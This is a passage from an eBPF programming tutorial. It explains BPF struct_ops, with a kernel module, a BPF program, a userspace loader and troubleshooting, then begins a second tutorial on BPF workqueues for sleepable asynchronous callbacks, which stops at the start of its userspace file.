.verifier_ops: This points to a structure of callbacks for the BPF verifier. It allows us to customize how the verifier treats BPF programs attached to this struct_ops. For example, we can control which helper functions are allowed. In our case, we use bpf_base_func_proto to allow a basic set of helpers, including bpf_trace_printk (the helper behind the bpf_printk macro), which is useful for debugging.
.init and .init_member: These are setup hooks. The kernel calls .init when the struct_ops type is registered, so the module can do any BTF (BPF Type Format) related setup, and .init_member for each member of the struct when a BPF implementation is installed, so the module can handle fields that need special treatment. Our module needs neither, so both simply return 0.
.name and .owner: These identify our struct_ops and tie it to our module, ensuring proper reference counting so the module isn't unloaded while a BPF program is still attached.
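The single-instance rule enforced by .reg and .unreg can be sketched in userspace with C11 atomics. This is an analogue under stated assumptions, not the module's code: atomic_compare_exchange_strong stands in for the kernel's cmpxchg, the names demo_reg and demo_unreg are hypothetical, and demo_unreg returns an error code where the module's callback only logs a warning.

```c
#include <errno.h>
#include <stdatomic.h>
#include <stddef.h>

struct demo_ops {
    int (*test_1)(void);
};

/* Single registration slot, analogous to the module's testmod_ops pointer. */
static _Atomic(struct demo_ops *) demo_slot;

/* Claim the slot only if it is empty; mirrors cmpxchg(&slot, NULL, ops). */
int demo_reg(struct demo_ops *ops)
{
    struct demo_ops *expected = NULL;

    if (!atomic_compare_exchange_strong(&demo_slot, &expected, ops))
        return -EEXIST; /* another instance is already registered */
    return 0;
}

/* Release the slot only if we own it; mirrors cmpxchg(&slot, ops, NULL). */
int demo_unreg(struct demo_ops *ops)
{
    struct demo_ops *expected = ops;

    if (!atomic_compare_exchange_strong(&demo_slot, &expected, NULL))
        return -ENOENT; /* slot is empty or held by a different instance */
    return 0;
}
```

Because the compare and the store happen as one atomic step, two concurrent registrations cannot both succeed, and an unregistration can never clear a slot that belongs to someone else.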

The module's testmod_init function is where the magic starts. It calls register_bpf_struct_ops, passing our definition. This makes the kernel aware of the new bpf_testmod_ops type, and from this point on, BPF programs can target it.

Finally, to make this demonstrable, the module creates a file in the proc filesystem: /proc/bpf_testmod_trigger. When a userspace program writes to this file, the trigger_write function is called. This function checks if a BPF program has registered an implementation for testmod_ops. If so, it calls the function pointers (test_1, test_2, test_3), which will execute the code in our BPF program. This provides a simple way to invoke the BPF-implemented operations from userspace. The use of RCU (rcu_read_lock, rcu_dereference) ensures that we can safely access the testmod_ops pointer even if it's being updated concurrently.
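The clamp, copy, and terminate sequence at the top of trigger_write is worth isolating, since it is what keeps an oversized write from overflowing the 64-byte buffer. Below is a userspace sketch of the same pattern; bounded_copy is a hypothetical helper, and memcpy stands in for copy_from_user.

```c
#include <stddef.h>
#include <string.h>

/*
 * Copy at most dst_size - 1 bytes from src into dst and NUL-terminate.
 * Returns the number of bytes copied, excluding the terminator.
 * memcpy stands in for copy_from_user in this userspace sketch.
 */
size_t bounded_copy(char *dst, size_t dst_size, const char *src, size_t count)
{
    if (dst_size == 0)
        return 0;
    if (count >= dst_size)
        count = dst_size - 1; /* leave room for the terminator */
    memcpy(dst, src, count);
    dst[count] = '\0';
    return count;
}
```

Note that the module returns the clamped count from trigger_write, so a write longer than 63 bytes is reported to userspace as a short write rather than an error.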

The BPF Program: Implementing the Operations

With the kernel module in place defining the what (the bpf_testmod_ops interface), we can now write a BPF program to define the how (the actual implementation of those operations). This BPF program will contain the logic that executes when the test_1, test_2, and test_3 functions are called from the kernel.

Complete BPF Program: `struct_ops.bpf.c`

This program provides the concrete implementations for the function pointers in bpf_testmod_ops.

/* SPDX-License-Identifier: GPL-2.0 */
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include "module/bpf_testmod.h"

char _license[] SEC("license") = "GPL";

/* Implement the struct_ops callbacks */
SEC("struct_ops/test_1")
int BPF_PROG(bpf_testmod_test_1)
{
    bpf_printk("BPF test_1 called!\n");
    return 42;
}

SEC("struct_ops/test_2")
int BPF_PROG(bpf_testmod_test_2, int a, int b)
{
    int result = a + b;
    bpf_printk("BPF test_2 called: %d + %d = %d\n", a, b, result);
    return result;
}

SEC("struct_ops/test_3")
int BPF_PROG(bpf_testmod_test_3, const char *buf, int len)
{
    char read_buf[64] = {0};
    int read_len = len < sizeof(read_buf) ? len : sizeof(read_buf) - 1;

    bpf_printk("BPF test_3 called with buffer length %d\n", len);

    /* Safely read from kernel buffer using bpf_probe_read_kernel */
    if (buf && read_len > 0) {
        long ret = bpf_probe_read_kernel(read_buf, read_len, buf);
        if (ret == 0) {
            /* Successfully read buffer - print first few characters */
            bpf_printk("Buffer content: '%c%c%c%c'\n",
                   read_buf[0], read_buf[1], read_buf[2], read_buf[3]);
            bpf_printk("Full buffer: %s\n", read_buf);
        } else {
            bpf_printk("Failed to read buffer, ret=%ld\n", ret);
        }
    }

    return len;
}

/* Define the struct_ops map */
SEC(".struct_ops")
struct bpf_testmod_ops testmod_ops = {
    .test_1 = (void *)bpf_testmod_test_1,
    .test_2 = (void *)bpf_testmod_test_2,
    .test_3 = (void *)bpf_testmod_test_3,
};

Understanding the BPF Code

The BPF code is remarkably straightforward, which is a testament to the power of the struct_ops abstraction.

Each function in the BPF program corresponds to one of the operations defined in the kernel module's bpf_testmod_ops struct. The magic lies in the SEC annotations:

SEC("struct_ops/test_1"): This tells the BPF loader that the bpf_testmod_test_1 program is an implementation for a struct_ops operation. The name after the slash is only a label: libbpf works out which member a program implements from the struct_ops map initializer (covered below), not from the section name. Matching the member name is still a good convention. The key part is the struct_ops prefix.

The implementations themselves are simple:

bpf_testmod_test_1: This function takes no arguments, prints a message to the kernel trace log using bpf_printk, and returns the integer 42.
bpf_testmod_test_2: This function takes two integers, a and b, calculates their sum, prints the operation and result, and returns the sum.
bpf_testmod_test_3: This function demonstrates handling data from userspace. It receives a character buffer and its length. It uses bpf_probe_read_kernel to safely copy the data from the buffer passed by the kernel module into a local buffer on the BPF stack. This is a crucial safety measure, as BPF programs cannot directly access arbitrary kernel memory pointers. After reading, it prints the content.
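The length clamp in bpf_testmod_test_3 compares a signed int against sizeof, which is unsigned, so it is worth checking what happens at the edges. The sketch below lifts that expression into a plain C function with the conversion written out, next to a variant that rejects non-positive lengths. Both function names and READ_BUF_SIZE are hypothetical, introduced only for this illustration.

```c
#include <stddef.h>

#define READ_BUF_SIZE 64

/* Same logic as the tutorial's expression, with the implicit conversion explicit. */
int clamp_as_written(int len)
{
    const size_t cap = READ_BUF_SIZE;

    /*
     * The int is converted to size_t for the comparison, so a negative
     * len becomes a huge unsigned value and takes the "too long" branch.
     */
    return (size_t)len < cap ? len : (int)(cap - 1);
}

/* Variant that treats zero and negative lengths as "nothing to read". */
int clamp_checked(int len)
{
    if (len <= 0)
        return 0;
    return len < READ_BUF_SIZE ? len : READ_BUF_SIZE - 1;
}
```

In the tutorial's flow the kernel module never passes a negative length, so the original expression is safe there. The checked variant is simply a more defensive choice if the same callback were driven by a less trusted caller.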

The final piece is the struct_ops map itself:

SEC(".struct_ops")
struct bpf_testmod_ops testmod_ops = {
    .test_1 = (void *)bpf_testmod_test_1,
    .test_2 = (void *)bpf_testmod_test_2,
    .test_3 = (void *)bpf_testmod_test_3,
};

This is the most critical part for linking everything together.

SEC(".struct_ops"): This special section identifies the following data structure as a struct_ops map.
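struct bpf_testmod_ops testmod_ops: We declare a variable named testmod_ops of the type struct bpf_testmod_ops. The type is what matters here: libbpf takes the struct type name (bpf_testmod_ops) and looks it up in kernel BTF, where it must match the name field in the bpf_struct_ops definition within the kernel module (.name = "bpf_testmod_ops"). This is how libbpf knows which kernel struct_ops this BPF program intends to implement. The variable name (testmod_ops) becomes the name of the struct_ops map, which is why the userspace loader refers to it as skel->maps.testmod_ops.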
The structure is initialized by assigning the BPF programs (bpf_testmod_test_1, etc.) to the corresponding function pointers. This maps our BPF functions to the "slots" in the struct_ops interface.

When the userspace loader attaches this struct_ops, libbpf and the kernel work together to find the bpf_testmod_ops registered by our kernel module and link these BPF programs as its implementation.

The Userspace Loader: Attaching and Triggering

The final component is the userspace program. Its job is to load the BPF program, attach it to the struct_ops defined by the kernel module, and then trigger the operations to demonstrate that everything is working.

Complete Userspace Program: `struct_ops.c`

#include <stdio.h>
#include <stdbool.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <bpf/bpf.h>
#include <bpf/libbpf.h>

#include "struct_ops.skel.h"

static volatile bool exiting = false;

void handle_signal(int sig) {
    exiting = true;
}

static int trigger_struct_ops(const char *message) {
    int fd, ret;

    fd = open("/proc/bpf_testmod_trigger", O_WRONLY);
    if (fd < 0) {
        perror("open /proc/bpf_testmod_trigger");
        return -1;
    }

    ret = write(fd, message, strlen(message));
    if (ret < 0) {
        perror("write");
        close(fd);
        return -1;
    }

    close(fd);
    return 0;
}

int main(int argc, char **argv) {
    struct struct_ops_bpf *skel;
    struct bpf_link *link;
    int err;

    signal(SIGINT, handle_signal);
    signal(SIGTERM, handle_signal);

    /* Open BPF application */
    skel = struct_ops_bpf__open();
    if (!skel) {
        fprintf(stderr, "Failed to open BPF skeleton\n");
        return 1;
    }

    /* Load BPF programs */
    err = struct_ops_bpf__load(skel);
    if (err) {
        fprintf(stderr, "Failed to load BPF skeleton: %d\n", err);
        goto cleanup;
    }

    /* Register struct_ops */
    link = bpf_map__attach_struct_ops(skel->maps.testmod_ops);
    if (!link) {
        fprintf(stderr, "Failed to attach struct_ops\n");
        err = -1;
        goto cleanup;
    }

    printf("Successfully loaded and attached BPF struct_ops!\n");
    printf("Triggering struct_ops callbacks...\n");

    /* Trigger the struct_ops by writing to proc file */
    if (trigger_struct_ops("Hello from userspace!") < 0) {
        printf("Failed to trigger struct_ops - is the kernel module loaded?\n");
        printf("Load it with: sudo insmod module/hello.ko\n");
    } else {
        printf("Triggered struct_ops successfully! Check dmesg for output.\n");
    }

    printf("\nPress Ctrl-C to exit...\n");

    /* Main loop - trigger periodically */
    while (!exiting) {
        sleep(2);
        if (!exiting && trigger_struct_ops("Periodic trigger") == 0) {
            printf("Triggered struct_ops again...\n");
        }
    }

    printf("\nDetaching struct_ops...\n");
    bpf_link__destroy(link);

cleanup:
    struct_ops_bpf__destroy(skel);
    return err < 0 ? -err : 0;
}

Understanding the Userspace Code

The userspace code orchestrates the entire process.

Signal Handling: It sets up a signal handler for SIGINT and SIGTERM to allow for a graceful exit. This is crucial for struct_ops because we need to ensure the BPF program is detached properly.
Open and Load: It uses the standard libbpf skeleton API to open and load the BPF application (struct_ops_bpf__open() and struct_ops_bpf__load()). This loads the BPF programs and the struct_ops map into the kernel.
Attach struct_ops: The key step is the attachment:
```
link = bpf_map__attach_struct_ops(skel->maps.testmod_ops);
```
This libbpf function does the heavy lifting. It takes the struct_ops map from our BPF skeleton (skel->maps.testmod_ops) and asks the kernel to link it to the corresponding struct_ops definition (which it finds by the name "bpf_testmod_ops"). If successful, the kernel's reg callback in our module is executed, and the function pointers in the kernel are now pointing to our BPF programs. The function returns a bpf_link, which represents the active attachment.
Triggering: The trigger_struct_ops function simply opens the /proc/bpf_testmod_trigger file and writes a message to it. This action invokes the trigger_write handler in our kernel module, which in turn calls the BPF-implemented operations.
Cleanup: When the user presses Ctrl-C, the exiting flag is set, the loop terminates, and bpf_link__destroy(link) is called. This is the counterpart to the attach step. It detaches the BPF programs, causing the kernel to call the unreg callback in our module. This cleans up the link and decrements the module's reference count, allowing it to be unloaded cleanly. If this step is skipped (e.g., by killing the process with -9), the module will remain "in use" until the kernel's garbage collection cleans up the link, which can take time.
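The graceful-exit logic can be tested on its own, without any BPF involved. Here is a minimal sketch that uses sigaction and a sig_atomic_t flag instead of the tutorial's signal() and bool; install_exit_handlers and exit_requested are hypothetical names, and this is one reasonable way to structure it rather than the tutorial's exact code.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <string.h>

/* sig_atomic_t is the type the C standard guarantees is safe to set in a handler. */
static volatile sig_atomic_t exiting;

static void handle_signal(int sig)
{
    (void)sig;
    exiting = 1;
}

/* Install the same handler for SIGINT and SIGTERM; returns 0 on success. */
int install_exit_handlers(void)
{
    struct sigaction sa;

    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = handle_signal;
    sigemptyset(&sa.sa_mask);

    if (sigaction(SIGINT, &sa, NULL) < 0)
        return -1;
    if (sigaction(SIGTERM, &sa, NULL) < 0)
        return -1;
    return 0;
}

/* Polled by the main loop to decide when to detach and clean up. */
int exit_requested(void)
{
    return exiting != 0;
}
```

The main loop would poll exit_requested() in place of the exiting flag and fall through to bpf_link__destroy() once it returns non-zero. The handler only sets a flag, so all real cleanup stays in normal program context.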

Compilation and Execution

Now that we have all three components—the kernel module, the BPF program, and the userspace loader—let's compile and run the example to see struct_ops in action.

1. Build the Kernel Module

First, navigate to the module directory and compile the kernel module. This requires having the kernel headers installed for your current kernel version.

cd module
make
cd ..

This will produce a hello.ko file, which is our compiled kernel module.

2. Load the Kernel Module

Load the module into the kernel using insmod. This will register our bpf_testmod_ops struct_ops type and create the /proc/bpf_testmod_trigger file.

sudo insmod module/hello.ko

You can verify that the module loaded successfully by checking the kernel log:

dmesg | tail -n 1

You should see a message like: bpf_testmod loaded with struct_ops support.

3. Build and Run the eBPF Application

Next, compile and run the userspace loader, which will also compile the BPF program.

make
sudo ./struct_ops

Upon running, the userspace application will:

Load the BPF programs.
Attach the BPF implementation to the bpf_testmod_ops struct_ops.
Write to /proc/bpf_testmod_trigger to invoke the BPF functions.

You should see output in your terminal like this:

Successfully loaded and attached BPF struct_ops!
Triggering struct_ops callbacks...
Triggered struct_ops successfully! Check dmesg for output.

Press Ctrl-C to exit...
Triggered struct_ops again...

4. Check the Kernel Log for BPF Output

While the userspace program is running, open another terminal and watch the kernel log to see the output from our BPF programs.

sudo dmesg -w

Every time the proc file is written to, you will see messages printed by the BPF programs via bpf_printk:

[ ... ] bpf_testmod_ops registered
[ ... ] Calling struct_ops callbacks:
[ ... ] BPF test_1 called!
[ ... ] test_1() returned: 42
[ ... ] BPF test_2 called: 10 + 20 = 30
[ ... ] test_2(10, 20) returned: 30
[ ... ] BPF test_3 called with buffer length 21
[ ... ] Buffer content: 'Hell'
[ ... ] Full buffer: Hello from userspace!
[ ... ] test_3() called with buffer

This output confirms that the calls from the kernel module are being correctly dispatched to our BPF programs.

5. Clean Up

When you are finished, press Ctrl-C in the terminal running ./struct_ops. The program will gracefully detach the BPF link. Then, you can unload the kernel module.

sudo rmmod hello

Finally, clean up the build artifacts:

make clean
cd module
make clean

Note on Unloading the Module: Gracefully stopping the userspace program is important. It ensures bpf_link__destroy() is called, which allows the kernel module's reference count to be decremented. If the userspace process is killed abruptly (e.g., with kill -9), the kernel releases the BPF link only after it closes the dead process's file descriptors, and that teardown is asynchronous, so the module may remain "in use" and rmmod may fail for a short while.

Troubleshooting Common Issues

When working with advanced features like struct_ops, which involve kernel modules, BTF, and the BPF verifier, you may encounter some tricky issues. This section covers common problems and their solutions, based on the development process of this example.

Issue 1: Failed to find BTF for struct_ops

Symptom: The userspace loader fails with an error like:

libbpf: failed to find BTF info for struct_ops/bpf_testmod_ops
Failed to attach struct_ops

Root Cause: This error means the kernel module (hello.ko) was compiled without the necessary BTF (BPF Type Format) information. The BPF system relies on BTF to understand the structure and types defined in the module, which is essential for linking the BPF program to the struct_ops.

Solution:

Ensure vmlinux with BTF is available: The kernel build system needs access to the vmlinux file corresponding to your running kernel to generate BTF for external modules. This file is often not available by default. You may need to copy it from /sys/kernel/btf/vmlinux or build it from your kernel source. A common location for the build system to look is /lib/modules/$(uname -r)/build/vmlinux.
Ensure pahole is up-to-date: BTF generation depends on the pahole tool (part of the dwarves package). Older versions of pahole may lack the features needed for modern BTF generation. pahole v1.16 is the minimum for vmlinux BTF, and BTF for kernel modules (split BTF) needs v1.19 or newer. If your distribution's version is too old, you may need to compile it from source.
Rebuild the module: After ensuring the dependencies are met, rebuild the kernel module. The Makefile for this example already includes the -g flag, which instructs the compiler to generate debug information that pahole uses to create BTF.

You can verify that BTF information is present in your module with readelf:

readelf -S module/hello.ko | grep .BTF

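You should see a section named .BTF, indicating that BTF data has been embedded. A .BTF.ext section is normally present only in compiled BPF object files, so its absence from a kernel module is not an error.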
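The same check can be done programmatically, for example from a build script or test harness. The sketch below walks the section header table of a 64-bit ELF file using the definitions in <elf.h>. The function name elf64_has_section() is hypothetical, and the code assumes a 64-bit ELF file with an ordinary (non-extended) section count.

```c
#include <elf.h>
#include <stdio.h>
#include <string.h>

/*
 * Return 1 if the 64-bit ELF file at path has a section called name,
 * 0 if it does not, and -1 on I/O or format errors.
 */
static int elf64_has_section(const char *path, const char *name)
{
    Elf64_Ehdr eh;
    Elf64_Shdr strhdr, sh;
    char buf[64];
    int found = 0;
    FILE *f = fopen(path, "rb");

    if (!f)
        return -1;
    if (fread(&eh, sizeof(eh), 1, f) != 1 ||
        memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64 ||
        eh.e_shentsize != sizeof(Elf64_Shdr) ||
        eh.e_shstrndx == SHN_UNDEF || eh.e_shstrndx >= eh.e_shnum)
        goto bad;

    /* Read the header of the section-name string table. */
    if (fseek(f, (long)(eh.e_shoff + (Elf64_Off)eh.e_shstrndx * sizeof(sh)), SEEK_SET) ||
        fread(&strhdr, sizeof(strhdr), 1, f) != 1)
        goto bad;

    for (unsigned int i = 0; i < eh.e_shnum && !found; i++) {
        size_t n;

        if (fseek(f, (long)(eh.e_shoff + (Elf64_Off)i * sizeof(sh)), SEEK_SET) ||
            fread(&sh, sizeof(sh), 1, f) != 1)
            goto bad;
        if (sh.sh_name >= strhdr.sh_size)
            continue;   /* name offset outside the string table */
        if (fseek(f, (long)(strhdr.sh_offset + sh.sh_name), SEEK_SET))
            goto bad;
        /* Names longer than the buffer are truncated and will not match. */
        n = fread(buf, 1, sizeof(buf) - 1, f);
        buf[n] = '\0';
        found = strcmp(buf, name) == 0;
    }
    fclose(f);
    return found;
bad:
    fclose(f);
    return -1;
}
```

Calling elf64_has_section("module/hello.ko", ".BTF") would then return 1 for a module built with BTF and 0 for one built without it.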

Issue 2: Kernel Panic on Module Load

Symptom: The system crashes (kernel panic) immediately after you run sudo insmod module/hello.ko. The dmesg log might show a NULL pointer dereference inside register_bpf_struct_ops.

Root Cause: The kernel's struct_ops registration logic expects certain callback pointers in the bpf_struct_ops structure to be non-NULL. In older kernel versions or certain configurations, if callbacks like .verifier_ops, .init, or .init_member are missing, the kernel may dereference a NULL pointer, causing a panic. The kernel's code doesn't always perform defensive NULL checks.

Solution: Always provide all required callbacks in your bpf_struct_ops definition, even if they are just empty functions.

// In module/hello.c
static const struct bpf_verifier_ops bpf_testmod_verifier_ops = {
    .is_valid_access = bpf_testmod_ops_is_valid_access,
    .get_func_proto = bpf_testmod_ops_get_func_proto,
};

static struct bpf_struct_ops bpf_testmod_ops_struct_ops = {
    .verifier_ops = &bpf_testmod_verifier_ops,  // REQUIRED
    .init = bpf_testmod_ops_init,              // REQUIRED
    .init_member = bpf_testmod_ops_init_member, // REQUIRED
    .reg = bpf_testmod_ops_reg,
    .unreg = bpf_testmod_ops_unreg,
    /* ... */
};

By explicitly defining these callbacks, you prevent the kernel from attempting to call a NULL function pointer.

Issue 3: BPF Program Fails to Load with "Invalid Argument"

Symptom: The userspace loader fails with an error indicating that a BPF helper function is not allowed.

libbpf: prog 'bpf_testmod_test_1': BPF program load failed: Invalid argument
program of this type cannot use helper bpf_trace_printk#6

Root Cause: BPF programs of type struct_ops run in a different kernel context than tracing programs (like kprobes or tracepoints). As a result, they are subject to a different, often more restrictive, set of allowed helper functions. The bpf_trace_printk helper (which bpf_printk is a macro for) is a tracing helper and is not allowed by default in struct_ops programs.

Solution: While you can't use bpf_printk by default, you can explicitly allow it for your struct_ops type. This is done in the kernel module by implementing the .get_func_proto callback in your bpf_verifier_ops.

// In module/hello.c
static const struct bpf_func_proto *
bpf_testmod_ops_get_func_proto(enum bpf_func_id func_id,
                   const struct bpf_prog *prog)
{
    /* Use base func proto which includes trace_printk and other basic helpers */
    return bpf_base_func_proto(func_id, prog);
}

static const struct bpf_verifier_ops bpf_testmod_verifier_ops = {
    .is_valid_access = bpf_testmod_ops_is_valid_access,
    .get_func_proto = bpf_testmod_ops_get_func_proto, // Add this line
};

The bpf_base_func_proto function provides access to a set of common, basic helpers, including bpf_trace_printk. By adding this to our verifier operations, we tell the BPF verifier that programs attached to bpf_testmod_ops are permitted to use these helpers. This makes debugging with bpf_printk possible.

Summary

In this tutorial, we explored the powerful capabilities of BPF struct_ops by moving beyond common examples. We demonstrated a robust pattern for extending the kernel: creating a minimal kernel module to define a new, BPF-programmable subsystem interface, and then providing the full, complex implementation in a safe, updatable BPF program. This approach combines the extensibility of kernel modules with the safety and flexibility of eBPF.

We saw how the kernel module registers a struct_ops type, how the BPF program implements the required functions, and how a userspace loader attaches this implementation and triggers its execution. This architecture opens the door to implementing a wide range of kernel-level features in BPF, from custom network protocols and security policies to new filesystem behaviors, all while maintaining system stability and avoiding the need to recompile the kernel.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Kernel Source for struct_ops: The implementation can be found in kernel/bpf/bpf_struct_ops.c in the Linux source tree.
Kernel Test Module for struct_ops: The official kernel self-test module provides a reference implementation: tools/testing/selftests/bpf/test_kmods/bpf_testmod.c.
BPF Documentation: The official BPF documentation in the kernel source: https://www.kernel.org/doc/html/latest/bpf/

eBPF Tutorial: BPF Workqueues for Asynchronous Sleepable Tasks

云微 — Tue, 20 Jan 2026 07:20:47 +0000

Ever needed your eBPF program to sleep, allocate memory, or wait for device I/O? Traditional eBPF programs run in restricted contexts where blocking operations are not allowed. But what if your HID device needs timing delays between injected key events, or your cleanup routine needs to sleep while freeing resources?

This is what BPF Workqueues enable. Created by Benjamin Tissoires at Red Hat in 2024 for HID-BPF device handling, workqueues let you schedule asynchronous work that runs in process context where sleeping and blocking operations are allowed. In this tutorial, we'll explore why workqueues were created, how they differ from timers, and build a complete example demonstrating async callback execution.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq

Introduction to BPF Workqueues: Solving the Sleep Problem

The Problem: When eBPF Can't Sleep

Before BPF workqueues existed, developers had bpf_timer for deferred execution. Timers work great for scheduling callbacks after a delay, perfect for updating counters or triggering periodic events. But there's a fundamental limitation that made timers unusable for certain critical use cases: bpf_timer runs in softirq (software interrupt) context.

Softirq context has strict rules enforced by the kernel. You cannot sleep or wait for I/O - any attempt to do so can cause kernel panics or deadlocks. You cannot allocate memory using kzalloc() with the GFP_KERNEL flag because such an allocation may sleep while waiting for pages. You cannot communicate with hardware devices that require waiting for responses. Essentially, you cannot perform any blocking operation that might cause the CPU to wait.

This limitation became a real problem for Benjamin Tissoires at Red Hat when he was developing HID-BPF in 2023. HID devices (keyboards, mice, tablets, game controllers) frequently need operations that timers simply can't handle. Imagine implementing keyboard macro functionality where pressing F1 types "hello" - you need 10ms delays between each keystroke for the system to properly process events. Or consider a device with buggy firmware that needs re-initialization after system wake - you must send commands and wait for hardware responses. Timer callbacks in softirq context can't do any of this.

As Benjamin Tissoires explained in his kernel patches: "I need something similar to bpf_timers, but not in soft IRQ context... the bpf_timer functionality would prevent me to kzalloc and wait for the device."

The Solution: Process Context Execution

In early 2024, Benjamin proposed and developed bpf_wq - essentially "bpf_timer but in process context instead of softirq." The kernel community merged it in April 2024, and it shipped in Linux v6.10. The key insight is simple but powerful: by running callbacks in process context (through the kernel's workqueue infrastructure), BPF programs gain access to the full range of kernel operations.

Here's what changes with process context:

Feature	bpf_timer (softirq)	bpf_wq (process)
Can sleep?	❌ No - will crash	✅ Yes - safe to sleep
Memory allocation	❌ Limited flags only	✅ Full kzalloc() support
Device I/O	❌ Cannot wait	✅ Can wait for responses
Blocking operations	❌ Prohibited	✅ Fully supported
Latency	Very low (microseconds)	Higher (milliseconds)
Use case	Time-critical fast path	Sleepable slow path

Workqueues enable the classic "fast path + slow path" pattern. Your eBPF program handles performance-critical operations immediately in the fast path, then schedules expensive cleanup or I/O operations to run asynchronously in the slow path. The fast path stays responsive while the slow path gets the capabilities it needs.

Real-World Applications

The applications span multiple domains. HID device handling was the original motivation - injecting keyboard macros with timing delays, fixing broken device firmware dynamically without kernel drivers, re-initializing devices after wake from sleep, transforming input events on the fly. All these require sleepable operations that only workqueues can provide.

Network packet processing benefits from async cleanup patterns. Your XDP program enforces rate limits and drops packets in the fast path (non-blocking), while a workqueue cleans up stale tracking entries in the background. This prevents memory leaks without impacting packet processing performance.
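To make the split concrete, here is a userspace model of that pattern in plain C. It is a sketch of the idea only, not BPF code. The flow table, fast_path(), and slow_path_cleanup() are hypothetical names, keys are assumed to be non-zero (0 marks a free slot), and the packet counter is reset only when an idle entry is evicted.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_FLOWS 8

/* Hypothetical per-flow tracking entry; key 0 marks a free slot. */
struct flow_entry {
    uint32_t key;
    uint64_t last_seen_ns;
    uint32_t packets;
};

static struct flow_entry flows[MAX_FLOWS];

/*
 * Fast path: bounded work, never blocks.
 * Returns 1 to pass the packet, 0 to drop it.
 */
static int fast_path(uint32_t key, uint64_t now_ns, uint32_t limit)
{
    struct flow_entry *free_slot = NULL;

    for (size_t i = 0; i < MAX_FLOWS; i++) {
        if (flows[i].key == key) {
            flows[i].last_seen_ns = now_ns;
            return ++flows[i].packets <= limit;
        }
        if (!free_slot && flows[i].key == 0)
            free_slot = &flows[i];
    }
    if (!free_slot)
        return 0;   /* table full: drop rather than wait for space */

    free_slot->key = key;
    free_slot->last_seen_ns = now_ns;
    free_slot->packets = 1;
    return 1 <= limit;
}

/*
 * Slow path: the part a workqueue callback would own.
 * Frees entries idle for longer than max_idle_ns and returns the count.
 */
static int slow_path_cleanup(uint64_t now_ns, uint64_t max_idle_ns)
{
    int freed = 0;

    for (size_t i = 0; i < MAX_FLOWS; i++) {
        if (flows[i].key != 0 &&
            now_ns - flows[i].last_seen_ns > max_idle_ns) {
            flows[i] = (struct flow_entry){0};
            freed++;
        }
    }
    return freed;
}
```

The fast path never scans for stale entries or frees anything, so its cost stays bounded per packet. All eviction work is pushed into the slow path, which can run whenever the system has time for it.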

Security monitoring can apply fast rules immediately, then use workqueues to query reputation databases or external threat intelligence services. The fast path makes instant decisions while the slow path updates policies based on complex analysis.

Resource cleanup defers expensive operations. Instead of blocking the main code path while freeing memory, closing connections, or compacting data structures, you schedule a workqueue to handle cleanup in the background.

Implementation: Simple Workqueue Test

Let's build a complete example that demonstrates the workqueue lifecycle. We'll create a program that triggers on the unlink syscall, schedules async work, and verifies that both the main path and workqueue callback execute correctly.

Complete BPF Program: wq_simple.bpf.c

// SPDX-License-Identifier: GPL-2.0
/* Simple BPF workqueue example */
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include "bpf_experimental.h"

char LICENSE[] SEC("license") = "GPL";

/* Element with embedded workqueue */
struct elem {
    int value;
    struct bpf_wq work;
};

/* Array to store our element */
struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 1);
    __type(key, int);
    __type(value, struct elem);
} array SEC(".maps");

/* Result variables */
__u32 wq_executed = 0;
__u32 main_executed = 0;

/* Workqueue callback - runs asynchronously in workqueue context */
static int wq_callback(void *map, int *key, void *value)
{
    struct elem *val = value;
    /* This runs later in workqueue context */
    wq_executed = 1;
    val->value = 42; /* Modify the value asynchronously */
    return 0;
}

/* Main program - schedules work */
SEC("fentry/do_unlinkat")
int test_workqueue(void *ctx)
{
    struct elem init = {.value = 0}, *val;
    struct bpf_wq *wq;
    int key = 0;

    main_executed = 1;

    /* Initialize element in map */
    bpf_map_update_elem(&array, &key, &init, 0);

    /* Get element from map */
    val = bpf_map_lookup_elem(&array, &key);
    if (!val)
        return 0;

    /* Initialize workqueue */
    wq = &val->work;
    if (bpf_wq_init(wq, &array, 0) != 0)
        return 0;

    /* Set callback function */
    if (bpf_wq_set_callback(wq, wq_callback, 0))
        return 0;

    /* Schedule work to run asynchronously */
    if (bpf_wq_start(wq, 0))
        return 0;

    return 0;
}

Understanding the BPF Code

The program demonstrates the complete workqueue workflow from initialization through async execution. We start by defining a structure that embeds a workqueue. The struct elem contains both application data (value) and the workqueue handle (struct bpf_wq work). This embedding pattern is critical - the workqueue infrastructure needs to know which map contains the workqueue structure, and embedding it in the map value establishes this relationship.

Our map is a simple array with one entry, chosen for simplicity in this example. In production code, you'd typically use hash maps to track multiple entities, each with its own embedded workqueue. The global variables wq_executed and main_executed serve as test instrumentation, letting userspace verify that both code paths ran.

The workqueue callback shows the signature that all workqueue callbacks must follow: int callback(void *map, int *key, void *value). The kernel invokes this function asynchronously in process context, passing the map containing the workqueue, the key of the entry, and a pointer to the value. This signature gives the callback full context about which element triggered it and access to the element's data. Our callback sets wq_executed = 1 to prove it ran, and modifies val->value = 42 to demonstrate that async modifications persist in the map.

The main program attached to fentry/do_unlinkat triggers whenever the unlink syscall executes. This gives us an easy way to activate the program - userspace just needs to delete a file. We set main_executed = 1 immediately to mark the synchronous path. Then we initialize an element and store it in the map using bpf_map_update_elem(). This is necessary because the workqueue must be embedded in a map entry.

The workqueue initialization follows a three-step sequence. First, bpf_wq_init(wq, &array, 0) initializes the workqueue handle, passing the map that contains it. The verifier uses this information to validate that the workqueue and its container are properly related. Second, bpf_wq_set_callback(wq, wq_callback, 0) registers our callback function. The verifier checks that the callback has the correct signature. Third, bpf_wq_start(wq, 0) schedules the workqueue to execute asynchronously. This call returns immediately - the main program continues executing while the kernel queues the work for later execution in process context.

The flags parameter in all three functions is reserved for future use and should be 0 in current kernels. The pattern allows future extensions without breaking API compatibility.

Complete User-Space Program: wq_simple.c

// SPDX-License-Identifier: GPL-2.0
